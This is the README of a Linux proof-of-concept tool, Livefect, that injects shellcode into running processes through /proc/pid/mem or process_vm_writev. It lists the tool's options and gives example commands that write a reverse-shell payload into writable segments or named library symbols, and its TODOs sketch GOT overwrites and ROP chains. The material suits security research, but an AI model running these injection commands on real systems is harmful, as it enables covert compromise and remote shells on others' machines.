
Livefect is a PoC tool to play around with /proc/pid/mem, process_vm_readv and process_vm_write as alternatives ways of injecting into processes without using ptrace directly.

Technically we still need the same privileges to use this as we need for ptrace but I mean, why not. It was fun to play around with this as I had to learn about ELF, shellcodes and Linux in general.

Excuse the terrible C code, it has been so long since I actually wrote anything in it.

I literally have no idea why I did this or if this is useful in any way or form. Enjoy :).

Some scenarios where this might be helpful:

  • Overwrite of a function’s code with our payload is necessary (see options -e, -S, –symbol, –library)
  • Overwrite of executable data is necessary (i.e. modify a variable’s dlsym value to an arbitrary address)
  • Overwrite of data (i.e. values which control process flow)

If you end up using this software any feedback or contribution is appreciated. If you go through the code… I’m really, really sorry for the mess (lol?).

TODOs and possible new features

  • Rewrite code to be less messy
  • Rewrite ELF parsing in a more structured way
  • When segment to rwx mem is found, write payload at given address (-a), then pad the rest of the mapped area with jmp address, to maximize a chanche of execution
  • Regex filters for function and export names
  • iovecs splitting if payload is > page_size (jump added at pagesize_bytes-jmpsize to jmp to next available area)
  • Find PLT/GOT entries of in-memory/loaded modules, overwrite address (this should be possible on RELRO binaries if the library is loaded at runtime)
  • See if feasable/useful allow reading ROP gadget addresses from file, file format could be something like that:
0x123456 // write first gadget here
0xff1122 // this is the first gadget
0x88eeaa // this is the second gadget
0x1122da // this is the third gadget
  • It’d be very cool if it could also look for XREFs in the binary to identify possible injection points
Disassemble and find XREFs
Fix offsets
Find all segments with specified permissions (i.e. rwx)
Return output of 
0x123    1
0x456    12
0x789    234         //then one can further inspect this addr, see if it's a function (--disams) and write here (-a 0x789)


To compile livefect, zydis is needed. Just run:

make # make livefect with all features and victim program

make victim # make the victim program to play around


You will likely need to be root to run this.

Livefect = Infect live, running processes
Usage: ./livefect [opts]
        -h --help:              show this help message
        -V --process-vm:        use process_vm_writev instead of /proc/[pid]/mem
        -p --pid PID:           run against specified pid (default: NULL)
        -f --file FILE:         file containing data to write/payload (default: NULL)
        -a --addr ADDR:         (raw mode) address to write data/payload to
        -v --verbosity LEVEL:   set verbosity level (default: 0)
        -P --perms PERMS:       which permissions to look for (default: rwxp)
        -S --func-only:         only display function symbols
           --symbol SYMBOL:     write FILE to all symbols with name SYMBOL
           --library LIBRARY:   to use with --symbol allow write to specific SYMBOL from specific LIBRARY
        -D --data-only:         only display data symbols
        -I --inject-all:        (potentially unsafe) force payload injection in any matching memory area
        -m --maps:              only list memory maps
           --disasm N:          (implies -m) try disassemble the first N instructions and show output (default: 0)
           --disasm-bytes N:    (implies -m) bytes to pass to disassembler (default: 64)
        -e --exports:           only list exported functions
        -F --force-disk:        force ELF exports lookup from disk
        -s --skip-root:         do not enforce root checks

Made while screaming in *PANIC* by @thatsn0mysite (


To simply display interesting segments we can use the -m or -e, to show memory segments and exports and quit. No writing is done (unless raw mode is on).

./livefect -me --pid 123


The simplest usage is to just run livefect with a payload as such:

./livefect -f shellcodes/reverse_shell 

this will attempt to find all writable segments containing exports and write our payload there, in ALL of em.


Another basic usage is using livefect’s raw mode:

./livefect -f shellcodes/reverse_shell -a 0x7fb75ed44109

this will attempt to write our payload at the specified address.


Some basic filtering has been implemented to semplify injection. For example to write payload at the address of symbol test_func we can use the --symbol and --library flags along with -P:

./livefect -f shellcode/reverse_shell --symbol test_func --library /usr/lib/ -P "r*x*" --pid 123

if we are lucky, this will write our payload into the test_func of library /usr/lib/ from pid 123, -P specifies the permissions we are looking for, using proc maps format.